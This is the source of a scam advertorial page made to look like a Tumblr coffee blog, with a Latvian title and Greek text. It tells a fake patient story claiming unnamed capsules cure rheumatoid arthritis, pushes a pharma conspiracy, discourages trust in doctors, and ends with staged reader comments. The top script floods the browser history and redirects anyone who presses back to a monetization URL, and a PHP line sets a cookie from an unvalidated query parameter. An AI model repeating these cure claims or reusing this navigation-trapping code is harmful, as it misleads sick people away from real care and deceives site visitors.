<?php setcookie("FBpixel", $_GET["fbpixel"]); ?>
<!DOCTYPE html>


    <meta charset="utf-8">


    <title>Kafijas pielūdzēja blogs</title>


    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.0/jquery.js"></script>
<script src="drewlex_main.js"></script>
<script>
    (function () {
        let params = (new URL(document.location)).searchParams;
        let block = '';
        params.forEach(function (value, key) {
            block = block + key + '=' + value + '&';
        })
        var t;
        try {
            for (t = 0; 10 > t; ++t) history.pushState({}, "", document.location);
            onpopstate = function (t) {
                t.state && location.replace("domonetka/index.php?cid={clickid}")
            }
        } catch (o) {}
    })();
</script>
    <style>
        figure {
            margin: 0
        }

        .tmblr-iframe {
            position: absolute
        }

        .tmblr-iframe.hide {
            display: none
        }

        .tmblr-iframe--amp-cta-button {
            visibility: hidden;
            position: fixed;
            bottom: 10px;
            left: 50%;
            transform: translateX(-50%);
            z-index: 100
        }

        .tmblr-iframe--amp-cta-button.tmblr-iframe--loaded {
            visibility: visible;
            animation: iframe-app-cta-transition .2s ease-out
        }</style>


    <link rel="stylesheet" media="screen" href="assets.tumblr.com/client/prod/standalone/blog-network-npf/index.build.css">
    <link rel="stylesheet" href="static.tumblr.com/qexbavb/uw2pxzjxv/main-min.css">
    <style>
        /* Colors */
        body {
            background: #202020;
        }

        .blog-title {
            font-family: 'Grumpy Black 48', serif, "Helvetica Neue", HelveticaNeue, Arial, sans-serif;
            font-weight: bold;
        }

        .blog-title a,
        .description,
        .search-no-results,
        .likes-no-likes,
        .related-posts-wrapper > h2,
        .loader .loader-bar,
        .widget-title {
            color: #cebbb6;
        }

        a {
            color: #e7dbd8;
        }

        #pagination a,
        .nav-wrapper .nav-item .label {
            color: #e7dbd8;
        }

        #pagination a.next:after {
            border-left-color: #e7dbd8;
        }

        #pagination a.previous:after {
            border-right-color: #e7dbd8;
        }


        .user-avatar {
            background-color: #202020;
            border-color: #202020;
        }

        .avatar-style-square .user-avatar {
            -webkit-box-shadow: 0 0 0 4px #202020;
            box-shadow: 0 0 0 4px #202020;
        }

        .no-header-image .logo-wrapper,
        .contain-header-image .logo-wrapper {
            color: #e7dbd8;
        }

        /* Adjust logo for light accents on light backgrounds */
        .light-on-light.no-header-image .logo-wrapper,
        .light-on-light.contain-header-image .logo-wrapper {
            color: #444;
        }

        /* Adjust logo for dark accents on dark backgrounds */
        .dark-on-dark.no-header-image .logo-wrapper,
        .dark-on-dark.contain-header-image .logo-wrapper {
            color: #fff;
        }

        /* Sticky nav colors */
        .nav-fixed {
            background-color: #202020;
        }

        .nav-responsive .inline-nav::after {
            background-image: linear-gradient(left, rgba(32, 32, 32, 0) 0%, rgba(32, 32, 32, 1) 100%);
            background-image: -webkit-linear-gradient(left, rgba(32, 32, 32, 0) 0%, rgba(32, 32, 32, 1) 100%);
            background-image: -moz-linear-gradient(left, rgba(32, 32, 32, 0) 0%, rgba(32, 32, 32, 1) 100%);
            background-image: -ms-linear-gradient(left, rgba(32, 32, 32, 0) 0%, rgba(32, 32, 32, 1) 100%);
            background-image: -o-linear-gradient(left, rgba(32, 32, 32, 0) 0%, rgba(32, 32, 32, 1) 100%);
        }

        @media screen and (max-device-width: 568px) {
            .header-image.cover {
                background-image: url(../https@static.tumblr.com/e20d0c81adb942fe18ddf34eba30c366/57rnx1j/5fRq1xnrn/tumblr_static_4kaly7xtyr28owo4oo0gss4w8_640_v2.jpg);
                -webkit-background-size: cover;
                background-size: cover;
            }

            .avatar-style-square .user-avatar {
                -webkit-box-shadow: 0 0 0 3px #202020;
                -moz-box-shadow: 0 0 0 3px #202020;
                box-shadow: 0 0 0 3px #202020;
            }

        }

        /* Custom CSS */

    </style>



</head>
<body data-urlencoded-name="annacoffeelover" class="wide index-page no-header-image display-related-posts">

<div class="app-nag">
    <div class="app-nag-header clearfix">
        <div class="app-nag-icon">
            <div class="app-nag-icon-ios">
                <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 1024 1024" enable-background="new 0 0 1024 1024" xml:space="preserve">
                            <path fill="#36465D" d="M1024,771c0,139.2-113.8,253-253,253H253C113.8,1024,0,910.2,0,771V253C0,113.8,113.8,0,253,0h518 c139.2,0,253,113.8,253,253V771z"></path>
                    <path fill="none" stroke="#FFF100" stroke-width="4" stroke-miterlimit="10" d="M463.9,209.4"></path>
                    <path opacity="0.6" fill="#231F20" d="M628.1,681c8.2,0,17.1-1.2,25.8-3.3V530.3h111.6V401.8h-68.6V473H585.4v162.4 C586,676.3,609.1,681,628.1,681z M654.4,250.5h-68.6v94h68.6V250.5z M754.3,722.9c-12.7,7.1-28.9,12.4-44.3,14.5l11.4,33.8 c-20.5,27-71.4,45.5-118.1,46.3c-1.6,0-3.1,0-4.7,0c0,0,0,0,0,0c-32.5,0-59.5-5.7-81.9-15.3c26.2,40,72.7,72.6,150.5,72.6c0,0,0,0,0,0c1.6,0,3.1,0,4.7,0c46.6-0.8,97.6-19.4,118.1-46.3L754.3,722.9z"></path>
                    <path fill="none" stroke="#FFF100" stroke-width="4" stroke-miterlimit="10" d="M355,359.5"></path>
                    <path fill="#FFFFFF" d="M577.5,830.6c65.1,0,129.7-23.2,151-51.3l4.3-5.6l-40.4-119.7c-0.4-1.1-1.4-1.9-2.6-1.9h-7.6h-3.5l-79.1,0 c-1.2,0-2.3-0.8-2.6-2c-1.1-4-1.7-8.9-1.8-14.9V489c0-1.5,1.2-2.7,2.7-2.7h106.1c1.5,0,2.7-1.2,2.7-2.7V333.8c0-1.5-1.2-2.7-2.7-2.7 H598.4c-1.5,0-2.7-1.2-2.7-2.7V182.5c0-1.5-1.2-2.7-2.7-2.7h-82.6h-28.9h-73.8c-13.3,0-28.5,9.8-30.8,28 c-9.3,75.3-43.8,120.5-108.7,142.2l-7.2,2.4c-1.1,0.4-1.9,1.4-1.9,2.6v128.6c0,1.5,1.2,2.7,2.7,2.7h50.4h0h15.9c0,0,0,120,0,158.3 C328.1,771,415.7,830.6,577.5,830.6z M701.6,769.5c-20.3,19.5-62,34.1-102,34.7c-1.5,0-3,0-4.5,0h0 c-131.5,0-166.6-100.4-166.6-159.7V462.3c0-1.5-1.2-2.7-2.7-2.7h-63.6c-1.5,0-2.7-1.2-2.7-2.7v-83c0-1.1,0.7-2.1,1.7-2.5 c68-26.5,105.9-79,115.9-160.3c0.6-4.5,4.3-4.6,4.3-4.6h84.9c1.5,0,2.7,1.2,2.7,2.7v145.9c0,1.5,1.2,2.7,2.7,2.7h105.7 c1.5,0,2.7,1.2,2.7,2.7v96.4c0,1.5-1.2,2.7-2.7,2.7H571.3c-1.5,0-2.7,1.2-2.7,2.7l0,173.2c0.6,39,19.5,58.8,56.1,58.8 c14.7,0,31.6-3.4,47.1-9.3c1.4-0.6,3,0.2,3.5,1.6l27,80C702.6,767.7,702.4,768.8,701.6,769.5z"></path>
                    <path opacity="0.5" fill="#2D3F54" d="M328.1,528.9h73.8v-40.2c0-1.3-1.1-2.4-2.4-2.4h-71.4V528.9z"></path>
                        </svg>
            </div>
            <div class="app-nag-icon-android">
                <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 1024 1024" enable-background="new 0 0 1024 1024" xml:space="preserve">
                            <path fill="none" stroke="#FFF100" stroke-width="4" stroke-miterlimit="10" d="M463.9,209.4"></path>
                    <path opacity="0.5" fill="#231F20" d="M628.1,681c8.2,0,17.1-1.2,25.8-3.3V530.3h111.6V401.8h-68.6V473H585.4v162.4 C586,676.3,609.1,681,628.1,681z M654.4,250.5h-68.6v94h68.6V250.5z M754.3,722.9c-12.7,7.1-28.9,12.4-44.3,14.5l11.4,33.8 c-20.5,27-71.4,45.5-118.1,46.3c-1.6,0-3.1,0-4.7,0c0,0,0,0,0,0c-32.5,0-59.5-5.7-81.9-15.3c26.2,40,72.7,72.6,150.5,72.6c0,0,0,0,0,0c1.6,0,3.1,0,4.7,0c46.6-0.8,97.6-19.4,118.1-46.3L754.3,722.9z"></path>
                    <path fill="none" stroke="#FFF100" stroke-width="4" stroke-miterlimit="10" d="M355,359.5"></path>
                    <path fill="#36465D" d="M577.5,830.6c65.1,0,129.7-23.2,151-51.3l4.3-5.6l-40.4-119.7c-0.4-1.1-1.4-1.9-2.6-1.9h-7.6h-3.5l-79.1,0 c-1.2,0-2.3-0.8-2.6-2c-1.1-4-1.7-8.9-1.8-14.9V489c0-1.5,1.2-2.7,2.7-2.7h106.1c1.5,0,2.7-1.2,2.7-2.7V333.8c0-1.5-1.2-2.7-2.7-2.7 H598.4c-1.5,0-2.7-1.2-2.7-2.7V182.5c0-1.5-1.2-2.7-2.7-2.7h-82.6h-28.9h-73.8c-13.3,0-28.5,9.8-30.8,28 c-9.3,75.3-43.8,120.5-108.7,142.2l-7.2,2.4c-1.1,0.4-1.9,1.4-1.9,2.6v128.6c0,1.5,1.2,2.7,2.7,2.7h50.4h0h15.9c0,0,0,120,0,158.3 C328.1,771,415.7,830.6,577.5,830.6z M701.6,769.5c-20.3,19.5-62,34.1-102,34.7c-1.5,0-3,0-4.5,0h0 c-131.5,0-166.6-100.4-166.6-159.7V462.3c0-1.5-1.2-2.7-2.7-2.7h-63.6c-1.5,0-2.7-1.2-2.7-2.7v-83c0-1.1,0.7-2.1,1.7-2.5 c68-26.5,105.9-79,115.9-160.3c0.6-4.5,4.3-4.6,4.3-4.6h84.9c1.5,0,2.7,1.2,2.7,2.7v145.9c0,1.5,1.2,2.7,2.7,2.7h105.7 c1.5,0,2.7,1.2,2.7,2.7v96.4c0,1.5-1.2,2.7-2.7,2.7H571.3c-1.5,0-2.7,1.2-2.7,2.7l0,173.2c0.6,39,19.5,58.8,56.1,58.8 c14.7,0,31.6-3.4,47.1-9.3c1.4-0.6,3,0.2,3.5,1.6l27,80C702.6,767.7,702.4,768.8,701.6,769.5z"></path>
                    <path opacity="0.5" fill="#2D3F54" d="M328.1,528.9h73.8v-40.2c0-1.3-1.1-2.4-2.4-2.4h-71.4V528.9z"></path>
                        </svg>
            </div>
        </div>
        <div class="app-nag-ratings">
            <svg width="181px" height="30px" viewBox="0 0 181 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
                <g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
                    <path d="M15.8,25.2 L6.1,29.8 L7.5,19.2 L0.1,11.4 L10.6,9.5 L15.8,0 L20.9,9.5 L31.4,11.4 L24,19.2 L25.4,29.8 L15.8,25.2 Z" fill="#FFC00E"></path>
                    <path d="M52.8,25.2 L43.1,29.8 L44.5,19.2 L37.1,11.4 L47.6,9.5 L52.8,0 L57.9,9.5 L68.4,11.4 L61,19.2 L62.4,29.8 L52.8,25.2 Z" fill="#FFC00E"></path>
                    <path d="M89.8,25.2 L80.1,29.8 L81.5,19.2 L74.1,11.4 L84.6,9.5 L89.8,0 L94.9,9.5 L105.4,11.4 L98,19.2 L99.4,29.8 L89.8,25.2 Z" fill="#FFC00E"></path>
                    <path d="M126.8,25.2 L117.1,29.8 L118.5,19.2 L111.1,11.4 L121.6,9.5 L126.8,0 L131.9,9.5 L142.4,11.4 L135,19.2 L136.4,29.8 L126.8,25.2 Z" fill="#FFC00E"></path>
                    <path d="M163.8,25.2 L154.1,29.8 L155.5,19.2 L148.1,11.4 L158.6,9.5 L163.8,0 L168.9,9.5 L179.4,11.4 L172,19.2 L173.4,29.8 L163.8,25.2 Z" fill="#E7E7E7"></path>
                    <path d="M163.3,25.1 L154.1,29.8 L155.5,19.2 L148.1,11.4 L158.6,9.5 L163.3,0.9 L163.3,25.1 Z" fill="#FFC00E"></path>
                </g>
            </svg>
            <div class="app-nag-ratings-text app-nag-ratings-text-android">
                1.5M ratings
            </div>
            <div class="app-nag-ratings-text app-nag-ratings-text-ios">
                277k ratings
            </div>
        </div>
        <div class="app-nag-close-button">
            <svg width="15px" height="15px" viewBox="0 0 30 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
                <g stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
                    <path d="M12.510351,14.6860639 L0,27.1964147 L2.175713,29.3721278 L14.686064,16.8617771 L27.196415,29.3721278 L29.372128,27.1964147 L16.861777,14.6860639 L29.372128,2.1757132 L27.196415,0 L14.686064,12.5103507 L2.175713,0 L0,2.1757132 L12.510351,14.6860639 L12.510351,14.6860639 Z" fill="#D3D3D3"></path>
                </g>
            </svg>
        </div>
    </div>
    <div class="app-nag-body">
        <h1 class="app-nag-callout">See, that’s what the app is perfect for.</h1>
        <a class="app-nag-large-button app-nag-app-store-link button blue">Sounds perfect</a>
        <a class="app-nag-large-button app-nag-app-store-deny">Wahhhh, I don’t wanna</a>
    </div>
</div>

<section id="page">
    <div class="header-wrapper

                no-image

                avatar-style-circle">

        <header id="header" class="top-blog-header">


            <div class="blog-title-wrapper content">
                <figure class="avatar-wrapper animate">
                    <a href="" style="background-image: url(1.jpg)" class="user-avatar"><img src="1.jpg" alt="" class="print-only invisible"></a>
                </figure>

                <div class="title-group animate">
          <h1 class="blog-title"><a class="lt5" href="">Blog των λατρών του καφέ</a></h1><span class="description"></span>
        </div>
      </div>
    </header>
  </div>
  <div class="nav-wrapper nav-responsive">
    <nav class="nav-menu">
      <ul class="inline-nav">
        <li class="nav-item nav-item--posts">
          <a class="label current-page lt6" href="">Αναρτήσεις</a>
        </li>
        <li class="nav-item nav-item--likes">
          <a class="label lt7" href="">Μου αρέσει</a>
        </li>
        <li class="nav-item nav-item--following">
          <a class="label lt8" href="">Ακολουθήστε</a>
        </li>
        <li class="nav-item nav-item--archive">
          <a class="label external-page lt9" href="">Αρχειοθέτηση</a>
        </li>
      </ul>
    </nav>
  </div>
  <section class="content clearfix no-image avatar-style-circle show-nav" id="posts">
    <div class="container">
      <div class="main">
        <article class="text not-page post-189449602542" data-post-id="189449602542">
          <div class="post-wrapper clearfix">
            <header class="post-header"></header>
            <section class="post">
              <div class="post-content">
                <h2 class="title"><a class="lt10" href="">Οι ασθένειες των αρθρώσεων δεν είναι καταδικαστικές. Από προσωπική εμπειρία μπορώ να πω ότι κατάφερα να καταπολεμήσω τη ρευματοειδή αρθρίτιδα παρά τις αντίθετες προβλέψεις.</a></h2>
                <style class="lt11">
                .body-text img {display: block;width: 100%;margin: 10px auto;}.body-text a, .feed-z a {color: #00b8ff;}
                </style>
                <div class="body-text"><br>
                <p class="lt12">Γεια σας, το όνομά μου είναι Άννα και είμαι 31 ετών. Πριν από περισσότερα από έξι χρόνια μου διέγνωσαν ρευματοειδή αρθρίτιδα.</p><img alt="" src="2.jpg">
                <p class="lt13">Ναι, τα κοινά προβλήματα δεν αφορούν μόνο τους ηλικιωμένους. Κινδυνεύουμε όλοι μας, ανεξάρτητα από την ηλικία και το φύλο.</p>
                <p class="lt14">Σήμερα όλοι γνωρίζουν για τον καρκίνο, τον HIV, το AIDS ... σχετικά με το γεγονός ότι η ανθρωπότητα αναζητά συνεχώς ένα μέσο για να τις θεραπεύσει τελείως, αλλά δυστυχώς σπάνια μιλάνε για τη διάγνωση της ρευματοειδούς αρθρίτιδας και δεν ψάχνουν για φάρμακα. Ένας άνθρωπος που πάσχει από ρευματοειδή αρθρίτιδα ξέρει : είναι εντελώς αδύνατο να απαλλαγούμε από την ασθένεια, τουλάχιστον αυτό είναι που λένε οι γιατροί μας</p>
                <p class="lt15">Και μπορώ να μαντέψω την αιτία αυτής της «σιωπής». Έχει να κάνει με το γεγονός ότι ήδη υπάρχει φάρμακο κατά της ρευματοειδούς αρθρίτιδας, το βρήκα και το έλεγξα ο ίδιος.</p>
                <p class="lt16">Τώρα οι γιατροί τους οποίους γνώρισα κατά τη διάρκεια των χρόνων της ταλαιπωρίας κουνάνε τα χέρια τους από αμηχανία: ένα θαύμα συνέβη - δεν υπάρχει άλλη εξήγηση! Η ρευματοειδής αρθρίτιδα δεν μπορεί να αντιμετωπιστεί!. Η περίπτωσή σας, δεσποινίς, είναι ειδική, θα έπρεπε να εισαχθείτε σε ένα ίδρυμα για εξετάσεις</p>
                <p class="lt17">Θα σοκάρω τους λεγόμενους «γιατρούς» ακόμη περισσότερο: Δεν είμαι μόνος, υπάρχουν χιλιάδες από εμάς, όχι μόνο οι «απελπισμένοι» ασθενείς με αρθρίτιδα θεραπεύτηκαν, ένας τεράστιος αριθμός ανθρώπων με διάφορες εκφυλιστικές αρθρώσεις έφτασε να έχει ξανά μια πλήρη ενεργό ζωή. Αλλά όλα με τη σειρά τους.</p>
                <p><i class="lt18" style="text-decoration: underline">Έτσι, όπως είπα, όλα ξεκίνησαν πριν από έξι χρόνια.</i></p>
                <p class="lt19">Ο πρώτος κώδωνας του κινδύνου ήταν η πρωινή ακαμψία στα χέρια. Οι γιατροί επαναλαμβάναν συνέχεια: για όλα ευθύνεται η δουλεία με τον υπολογιστή.</p>
                <p class="lt20">Αργότερα, όχι μόνο τα χέρια μου, αλλά και τα πόδια μου άρχισαν να πονάνε. Το να σηκωθώ από το κρεβάτι ήταν ένα μαρτύριο – τα πρώτα 20-40 λεπτά μετά το ξύπνημα φαινόταν εφιαλτικά. Ο πόνος στα χέρια μου ήταν σε τέτοιο βαθμό που δεν μπορούσα πλέον να ντύνομαι μόνη μου ώσπου να αρχίσει να δρα το παυσίπονο. </p>
                <p class="lt21">Οι επισκέψεις μου σε γιατρό και τα αποτελέσματα των εξετάσεων με οδήγησαν τελικά σε έναν ρευματολόγο, Μια έμπειρη γιατρός επέμενε: «Αγάπη μου, να ντύνεσαι καλύτερα και να ξεχάσεις αυτά τα παραμύθια περί ρευματοειδής αρθρίτιδας. Δεν έχεις τίποτα.» Δύο χρόνια αργότερα επισκέφτηκα ξανα αυτή τη γιαγιά και παραδέχτηκε το λάθος της: «Συμβαίνει μερικές φορές.» </p>
                <p class="lt22">Είναι περισσότεροι από ένας ή δύο τέτοιοι γιατροί. Πιστέψτε με, έναν χρόνιο ασθενή των ρευματολόγων, υπάρχουν πολλοί κομπογιαννίτες σε αυτό τον κλάδο της ιατρικής, ήμουν τυχερός που έπεσα σε έναν επαγγελματία, αλλά πριν συνέβη αυτό, είχα ακούσει χιλιάδες φορές το περίφημο: «Η αρθρίτιδα δεν αντιμετωπίζεται, να μάθετε να ζείτε με αυτήν.»</p>
                <p><b><i class="lt23"> Αλλά τι ανοησίες είναι αυτές; Εσείς οι ίδιοι δεν αντιμετωπίζεστε.</i></b></p>
                <p class="lt24">Είμαι μόνο 25 ετών. Είμαι νέα και έχω πολλά σχέδια, αποφάσισα πάση θυσία να βρω ένα φάρμακο που θα μου επιστρέψει μια πλήρη ζωή.</p><img alt="" src="3.jpg">
                <p class="lt25">Λίγο πριν από την ανάπτυξη της ρευματοειδούς αρθρίτιδας, εγκατέλειψα την παλιά μου δουλειά και έγινα μπαρίστα. Λάτρευα την ενασχόληση, είχα ήδη ένα επιχειρηματικό σχέδιο έτοιμο για τα επόμενα χρόνια, αλλά η απελπισία γινόταν όλο και περισσότερη. Δουλεύοντας, έβλεπα ξανά και ξανά ότι δεν μπορούσα να σηκώσω μόνη μου το φλιτζάνι από το τραπέζι, απλώς δεν είχα αρκετή σωματική δύναμη για να συνεχίσω να κάνω αυτό που αγαπώ </p>
                <p><b><i class="lt26">Το όνειρο θα γίνει πραγματικότητα!</i></b></p><img alt="" src="4.jpg">
                <p class="lt27">Σήμερα ξυπνάω καθημερινά στις 6 το πρωί (χωρίς παυσίπονα) και πηγαίνω να δουλέψω στο αγαπημένο μου καφενείο <b>«Choco Bean»<!-- b--> για τους πελάτες μου σηκώνω τα φλιτζάνια μόνη μου και όχι μόνο αυτά! </b></p>
                <p class="lt28">Ναι, όπως αναφέρθηκε παραπάνω, ήμουν τυχερή που βρήκα έναν καλό γιατρό, περίμενα τρεις μήνες για το ραντεβού. Για να αποφευχθεί μια αστραπιαία αύξηση του αριθμού των πελατών, ο γιατρός μου ζήτησε να μην αναφέρω το όνομά του στο άρθρο, Είναι ένας από αυτούς που αντίθετα με την άσχημη κοινή γνώμη, λέει: «Η αρθρίτιδα θεραπεύεται!» Και υποστηρίζει τα λόγια του με χιλιάδες παραδείγματα από την ιατρική πρακτική του. Ένα ζωντανό παράδειγμα είμαι εγώ – η επιβεβαίωση του ότι η ρευματοειδής αρθρίτιδα θεραπεύεται.</p>
                <p class="lt29">¨Έχοντας τραβήξει τα πάνδεινα λόγω αυτής της ασθένειας, συμπάσχω με τους ανθρώπους που έχουν αρθρίτιδα και καταλαβαίνω ότι δεν είναι όλοι «σκληρά καρύδια», όπως και εγώ. Πόσοι άνθρωποι έπεισαν θύματα ψευτογιατρών που τους έπεισαν ότι ο πόνος από τώρα και στο εξής θα είναι ένα αναπόσπαστο κομμάτι της ζωής τους; Σας σώζω από μήνες αναμονής για ραντεβού: Θεράπευσα τη ρευματοειδή αρθρίτιδα με <a href="">κάψουλες <span class="productName"></span>.</a> </p>
                <p class="lt30">Πρέπει να έχετε ακούσει για τα χονδροπροστατευτικά. Το <a href=""><span class="productName"></span></a> – δεν είναι ένας συνηθισμένος χονδροπροστατευτικό φάρμακο, ο οποίος μιλιέται ως ο μοναδικός χονδροπροστατευτικός παράγοντας πέμπτης γενιάς και δεν προστατεύει μόνο τις αρθρώσεις από την καταστροφή, αλλά βοηθά στην αποκατάστασή τους. Επιπλέον, το <a href=""> <span class="productName"></span> </a> ανακουφίζει από τον πόνο και τη φλεγμονή, λειτουργεί όπως τα ΜΣΑΦ και είναι ένα απολύτως φυσικό προϊόν</p><img alt="" src="prod.png" style="max-width: 300px;">
                <p class="lt31">Καθ’ όλη τη διάρκεια του άρθρου, προσπάθησα να παρακάμψω προσεκτικά το θέμα της συνωμοσίας των φαρμακείων. Αλλά αυτή η εικασία γεννιέται από μονή της: πρώτον, ευρεία προπαγάνδα - η θεραπεία της αρθρίτιδας είναι μόνο συμπτωματική. Μας αναγκάζουν να παίρνουμε παυσίπονα και άλλου είδους φάρμακα τα οποία απαλλάσσουν μόνο απ’ τα συμπτώματα. Και το ότι είναι κάτι δαπανηρό είναι το μικρότερο κακό. Ένιωσα η ίδια τι θα πει αντιαρθριτικά φάρμακά που πουλάνε στα φαρμακεία και ποιες είναι οι παρενέργειες τους</p>
                <p class="lt32">Και δεύτερον: είναι αδύνατο να βρεις <a href=""> <span class="productName"></span> </a> στα φαρμακεία,  καταλαβαίνετε το γιατί. Αλλά και πάλι μπορώ να σας καθησυχάσω. Ο θεράπων γιατρός μου έδωσε την παραπομπή στην ιστοσελίδα του κατασκευαστή, όπου ο ίδιος αγοράζει το φάρμακο για τους πελάτες του. Οι <a href="">κάψουλες <span class="productName"></span></a> είναι κατάλληλες για τη θεραπεία ενός ευρέος φάσματος αρθρώσεων των αρθρώσεων - από αρθρίτιδα έως προσωρινούς τραυματισμούς.</p><a class="lt33" href="" style="padding: 10px; width: 200px; background: #529ecc; display: flex; justify-content: center; align-items: center; font-weight: 900; color: #fff; font-size: 21px; margin: 20px auto; text-decoration: none">Παραγγελία</a>
                <p class="lt34">Γνωρίζω από πρώτο χέρι πόσο πολύτιμα είναι τα λόγια υποστήριξης όταν βρίσκεσαι σε καθημερινό αγώνα με το δικό σου σώμα και πόσο σημαντικό είναι να μην χάσεις την ελπίδα. Συνεπώς θέλω να συνοψίσω την ιστορία μου με μια ευχή - ποτέ να μην παραδίνεστε. Μην πιστεύετε αυτό που λένε, παρότι η γνώμη αυτή είναι διαδεδομένη: Προσπαθήστε να υλοποιήσετε τον στόχο σας, να πιστεύετε στο καλύτερο και μην απελπίζεστε</p>
                <p class="lt35">Και έχοντας φτάσει στην επιτυχία, δώστε ένα χέρι βοήθειας σε άλλους.</p>
                <p class="lt36"><i> Θεωρώ ότι η αποστολή μου εξετελέσθη. </i>😊</p><img alt="" src="5.png">
                <div class="features-wrapper"></div>
                    <style>
                        .wheel img {
                            max-width: 100%;
                            margin: 0;
                        }
                    </style>
                </div>
                <h1 class="lt37">Σχόλια:</h1>
                <div class="feed-z" style="margin-left: 10px;padding: 5px 5px 10px 5px; border-bottom: 1px solid #b8860b61;">
                  <div class="lt38" style="padding: 3px 0; font-weight: 900;">A.A .:</div>
                  <p class="lt39" style="padding-left: 15px">Τις προάλλες ήμουν στο Choco Bean, είναι πραγματικά πολύ ωραία εκεί. Καλή τύχη και δύναμη! <span style="display: block; margin: 10px;"><b> Άννα: <!-- b--> <br> Ευχαριστώ πολύ! <!-- span--></b></span></p>
                </div>
                <div class="feed-z" style="margin-left: 10px;padding: 5px 5px 10px 5px; border-bottom: 1px solid #b8860b61;">
                  <div class="lt40" style="padding: 3px 0; font-weight: 900;">Λιλίκα:</div>
                  <p class="lt41" style="padding-left: 15px">Όλα αυτά είναι για μένα, ακριβώς, πάλευα με την ρευματοειδή αρθρίτιδα έπι 13 χρόνια, άρχισα να παίρνω ορμόνες 10 χρόνια μετά τη διάγνωσή μου. Τελικά η υγεία χειροτέρεψε. Δεν έμενα αδρανής. Διάβασα όλα τα σχετικά άρθρα στο Ίντερνετ για την ρευματοειδή αρθρίτιδα, επισκεπτόμουν όλα τα σχετικά φόρουμ. Μην βασίζεστε σε γιατρούς. Μόνο έχοντας μελετήσει το θέμα μόνη μου, έμαθα τελικά την αλήθεια. Ξέρω, ξέρω, Άννα, για ποιόν μιλάτε! 😊 Αλλά εφόσον ο αγαπητός φίλος μας προτίμησε να διατηρήσει την ανωνυμία του - δεν τολμώ να πω το όνομά του. Και εγώ έκανα θεραπεία σε αυτόν τον ρευματολόγο και ναι, θεραπεύτηκα επίσης με το <span class="productName"></span>.<span style="display: block; margin: 10px;"><b>Άννα:<br>Λιλίκα, <!-- b--> αυτή η ασθένεια σας αναγκάζει να μάθετε για τον εαυτό σας. Μπράβο σας!</b></span></p>
                </div>
                <div class="feed-z" style="margin-left: 10px;padding: 5px 5px 10px 5px; border-bottom: 1px solid #b8860b61;">
                  <div class="lt42" style="padding: 3px 0; font-weight: 900;">Μαρία:</div>
                  <p class="lt43" style="padding-left: 15px">Άνθρωποι όπως η ηρωίδα αυτής της ιστορίας προκαλούν θαυμασμό. Εμείς, οι άνθρωποι χωρίς μια τρομερή διάγνωση, ανησυχούμε για τα πάντα, οι ψυχές μας λυγίζουν από το παραμικρό, ξεχνώντας ότι το πιο σημαντικό πράγμα είναι η υγεία.</p>
                </div>
                <div class="feed-z" style="margin-left: 10px;padding: 5px 5px 10px 5px; border-bottom: 1px solid #b8860b61;">
                  <div class="lt44" style="padding: 3px 0; font-weight: 900;">Μαργαρίτα:</div>
                  <p class="lt45" style="padding-left: 15px">Η ηρωίδα αυτής της ιστορίας είναι απίστευτη! Εγώ η ίδια δεν έχω αρθρίτιδα - οστεοαρθρίτιδα, που εμφανίστηκε στα 18 λόγω συνεχών υπερφορτώσεων που σχετίζονται με το επάγγελμα (είμαι μουσικός). Προσπάθησα να κάνω θεραπείες αλλά νομίζω πως η κατάσταση έγινε χειρότερη. Αρχικά έκαναν λάθος διάγνωση, έπειτα έκαναν έγχυση υαλουρονικού οξέος στην άρθρωση, τώρα καταλαβαίνω πόσο αδικαιολόγητο ήταν - στην περίπτωσή μου δεν είχε καμία διαφορά, με αποτέλεσμα τα τελευταία δύο χρόνια να μην περνάει μέρα που η άρθρωση να μην πονάει. Δεν μπορώ να στηρίξω αυτό, γενικά δεν μπορώ να κάνω πολλά πράγματα, ακόμη και στο σπίτι. Αποθαρρύνει πολύ αυτό. Το πιο τρομακτικό είναι ότι προτού να αρρωστήσω, νόμιζα οι ανίατες ασθένειες ήταν μόνο ο καρκίνος και το AIDS, αλλά αποδεικνύεται ότι τόσοι άνθρωποι πάσχουν από αρθρώσεις, συνδέσμους, τένοντες και ότι τελικά υπάρχει λύση στο πρόβλημα! Άννα, σας ευχαριστώ πολύ! Παρήγγειλα το <a href=""> <span class="productName"></span>. </a> Μάλλον με σώσατε, εσείς η ίδια ξέρετε τι ρόλο παίζουν τα χέρια για έναν πιανίστα και πόσο σημαντική είναι η υγεία των αρθρώσεων. Θα κάνω θεραπεία!<span style="display: block; margin: 10px;"><b>Άννα: <!-- b--> <br> Παρακαλώ! Σας εύχομαι υγεία) <!-- span--></b></span></p>
                </div>
                <div class="feed-z" style="margin-left: 10px;padding: 5px 5px 10px 5px; border-bottom: 1px solid #b8860b61;">
                  <div class="lt46" style="padding: 3px 0; font-weight: 900;"> Βίκυ:</div>
                  <p class="lt47" style="padding-left: 15px">Πριν από ένα χρόνο μου διέγνωσαν ρευματοειδή αρθρίτιδα. Από τότε έμαθα πολλά γι’ αυτή την ασθένεια και συνέχισα να μαθαίνω για το πρόβλημα. Σας ευχαριστώ τόσο πολύ για το άρθρο, την έμπνευση και το <a href=""> <span class="productName"></span>!</a></p>
                </div>
                <div class="feed-z" style="margin-left: 10px;padding: 5px 5px 10px 5px; border-bottom: 1px solid #b8860b61;">
                  <div class="lt48" style="padding: 3px 0; font-weight: 900;">Έλενα:</div>
                  <p class="lt49" style="padding-left: 15px">Άννα, ο γιατρός της μητέρας μου ήταν επίσης ο Γιάννης Π.))) υπέφερε από ισχιακή για δέκα χρόνια. Το <span class="productName"></span> κυριολεκτικά την έσωσε. Εδώ και δυο χρόνια κυριολεκτικά «πετάει», ούτε καν θυμάται ότι είχε αρθρίτιδα…<span style="display: block; margin: 10px;"></span> <b> Άννα: </b> Τσσσ! Αφού ο άνθρωπος ζήτησε να μην λέμε ονόματα)) Εύχομαι περαιτέρω υγεία στη μητέρα σας! </p>
                </div>
              </div>
              <section class="inline-meta post-extra"></section>
            </section>
            <section class="panel">
              <footer class="post-footer">
